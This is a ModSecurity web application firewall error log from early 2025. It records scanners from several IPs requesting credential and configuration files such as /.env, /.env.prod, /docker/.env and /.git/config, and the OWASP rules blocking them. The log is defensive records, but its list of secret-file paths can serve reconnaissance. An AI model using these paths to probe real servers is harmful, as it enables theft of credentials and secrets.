[Sat Feb 22 23:01:39.816920 2025] [:error] [pid 1324770] [client 45.148.10.166:42862] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "Z7pJQ010iGF_xgbBjepwDgAAAAI"], referer: https://www.google.com/
[Sat Feb 22 23:01:39.817954 2025] [:error] [pid 1324770] [client 45.148.10.166:42862] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "Z7pJQ010iGF_xgbBjepwDgAAAAI"], referer: https://www.google.com/
[Sat Feb 22 23:01:39.818477 2025] [:error] [pid 1324770] [client 45.148.10.166:42862] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "Z7pJQ010iGF_xgbBjepwDgAAAAI"], referer: https://www.google.com/
[Tue Feb 25 16:07:38.500557 2025] [:error] [pid 1389725] [client 45.148.10.166:5536] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z73cuib8npOp1X2VM8ycHwAAAA4"]
[Tue Feb 25 16:07:38.503505 2025] [:error] [pid 1389011] [client 45.148.10.166:5526] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z73cumn7Y5tHFTsk95lXrwAAAAA"]
[Tue Feb 25 16:07:38.506306 2025] [:error] [pid 1389725] [client 45.148.10.166:5536] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z73cuib8npOp1X2VM8ycHwAAAA4"]
[Tue Feb 25 16:07:38.506388 2025] [:error] [pid 1389011] [client 45.148.10.166:5526] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z73cumn7Y5tHFTsk95lXrwAAAAA"]
[Tue Feb 25 16:07:38.506525 2025] [:error] [pid 1389725] [client 45.148.10.166:5536] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z73cuib8npOp1X2VM8ycHwAAAA4"]
[Tue Feb 25 16:07:38.506607 2025] [:error] [pid 1389011] [client 45.148.10.166:5526] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z73cumn7Y5tHFTsk95lXrwAAAAA"]
[Tue Feb 25 16:07:38.506031 2025] [:error] [pid 1389050] [client 45.148.10.166:5538] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z73cuosFeyn5EEAu5NOrqgAAAAc"]
[Tue Feb 25 16:07:38.507138 2025] [:error] [pid 1389050] [client 45.148.10.166:5538] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z73cuosFeyn5EEAu5NOrqgAAAAc"]
[Tue Feb 25 16:07:38.507299 2025] [:error] [pid 1389050] [client 45.148.10.166:5538] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z73cuosFeyn5EEAu5NOrqgAAAAc"]
[Tue Feb 25 16:07:38.507787 2025] [authz_core:error] [pid 1389049] [client 45.148.10.166:5518] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Tue Feb 25 16:07:38.519103 2025] [:error] [pid 1390792] [client 45.148.10.166:5562] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z73cuh-mFNrxuGLULyJA0AAAAAg"]
[Tue Feb 25 16:07:38.519298 2025] [:error] [pid 1390792] [client 45.148.10.166:5562] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z73cuh-mFNrxuGLULyJA0AAAAAg"]
[Tue Feb 25 16:07:38.519450 2025] [:error] [pid 1390792] [client 45.148.10.166:5562] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z73cuh-mFNrxuGLULyJA0AAAAAg"]
[Tue Feb 25 16:07:38.520512 2025] [:error] [pid 1389015] [client 45.148.10.166:5554] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z73cup1hdn-r9XfNoxuCXQAAAAQ"]
[Tue Feb 25 16:07:38.520686 2025] [:error] [pid 1389015] [client 45.148.10.166:5554] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z73cup1hdn-r9XfNoxuCXQAAAAQ"]
[Tue Feb 25 16:07:38.520828 2025] [:error] [pid 1389015] [client 45.148.10.166:5554] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z73cup1hdn-r9XfNoxuCXQAAAAQ"]
[Tue Feb 25 16:07:38.521833 2025] [:error] [pid 1390794] [client 45.148.10.166:5522] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z73cuhiEdJfJoF0owQWEAQAAAAo"]
[Tue Feb 25 16:07:38.521997 2025] [:error] [pid 1390794] [client 45.148.10.166:5522] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z73cuhiEdJfJoF0owQWEAQAAAAo"]
[Tue Feb 25 16:07:38.522164 2025] [:error] [pid 1390794] [client 45.148.10.166:5522] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z73cuhiEdJfJoF0owQWEAQAAAAo"]
[Tue Feb 25 16:07:39.830980 2025] [:error] [pid 1401362] [client 45.148.10.166:5574] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "Z73cu1VKhQ5cvWMf1kzqOwAAAAM"]
[Tue Feb 25 16:07:39.831828 2025] [:error] [pid 1401362] [client 45.148.10.166:5574] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "Z73cu1VKhQ5cvWMf1kzqOwAAAAM"]
[Tue Feb 25 16:07:39.832252 2025] [:error] [pid 1401362] [client 45.148.10.166:5574] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "Z73cu1VKhQ5cvWMf1kzqOwAAAAM"]
[Tue Feb 25 16:07:40.829287 2025] [:error] [pid 1401364] [client 45.148.10.166:5590] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z73cvMkRTgrRq5HMqLe2ZQAAAAs"]
[Tue Feb 25 16:07:40.829734 2025] [:error] [pid 1401364] [client 45.148.10.166:5590] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z73cvMkRTgrRq5HMqLe2ZQAAAAs"]
[Tue Feb 25 16:07:40.830025 2025] [:error] [pid 1401364] [client 45.148.10.166:5590] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z73cvMkRTgrRq5HMqLe2ZQAAAAs"]
[Thu Feb 27 17:13:03.018777 2025] [:error] [pid 1444809] [client 18.133.175.70:41120] [client 18.133.175.70] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z8CPD_oZ9XJ3FXembDfxlgAAAAQ"]
[Thu Feb 27 17:13:03.021392 2025] [:error] [pid 1444809] [client 18.133.175.70:41120] [client 18.133.175.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z8CPD_oZ9XJ3FXembDfxlgAAAAQ"]
[Thu Feb 27 17:13:03.021730 2025] [:error] [pid 1444809] [client 18.133.175.70:41120] [client 18.133.175.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z8CPD_oZ9XJ3FXembDfxlgAAAAQ"]
[Sat Mar 01 13:21:45.903900 2025] [:error] [pid 1493089] [client 45.148.10.80:33902] [client 45.148.10.80] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z8L72d_xBm5JReBJp8rnmwAAABQ"]
[Sat Mar 01 13:21:45.905857 2025] [:error] [pid 1493089] [client 45.148.10.80:33902] [client 45.148.10.80] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z8L72d_xBm5JReBJp8rnmwAAABQ"]
[Sat Mar 01 13:21:45.906373 2025] [:error] [pid 1493089] [client 45.148.10.80:33902] [client 45.148.10.80] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z8L72d_xBm5JReBJp8rnmwAAABQ"]
[Sat Mar 01 13:21:47.943198 2025] [:error] [pid 1493090] [client 45.148.10.80:33904] [client 45.148.10.80] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z8L726QMLtFbjtR0yViHDQAAABU"]
[Sat Mar 01 13:21:47.943614 2025] [:error] [pid 1493090] [client 45.148.10.80:33904] [client 45.148.10.80] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z8L726QMLtFbjtR0yViHDQAAABU"]
[Sat Mar 01 13:21:47.948344 2025] [:error] [pid 1493090] [client 45.148.10.80:33904] [client 45.148.10.80] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z8L726QMLtFbjtR0yViHDQAAABU"]
[Sun Mar 02 15:38:35.492679 2025] [:error] [pid 1510761] [client 194.88.99.44:13342] [client 194.88.99.44] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z8Rtaz-6H96pdG8Iym3nfgAAAAE"]
[Sun Mar 02 15:38:35.493195 2025] [:error] [pid 1510761] [client 194.88.99.44:13342] [client 194.88.99.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z8Rtaz-6H96pdG8Iym3nfgAAAAE"]
[Sun Mar 02 15:38:35.493740 2025] [:error] [pid 1510761] [client 194.88.99.44:13342] [client 194.88.99.44] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z8Rtaz-6H96pdG8Iym3nfgAAAAE"]
[Thu Mar 06 21:16:04.915452 2025] [:error] [pid 1596876] [client 193.41.206.50:50672] [client 193.41.206.50] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z8oChAtea6oevJ_vrnxS0gAAAAo"]
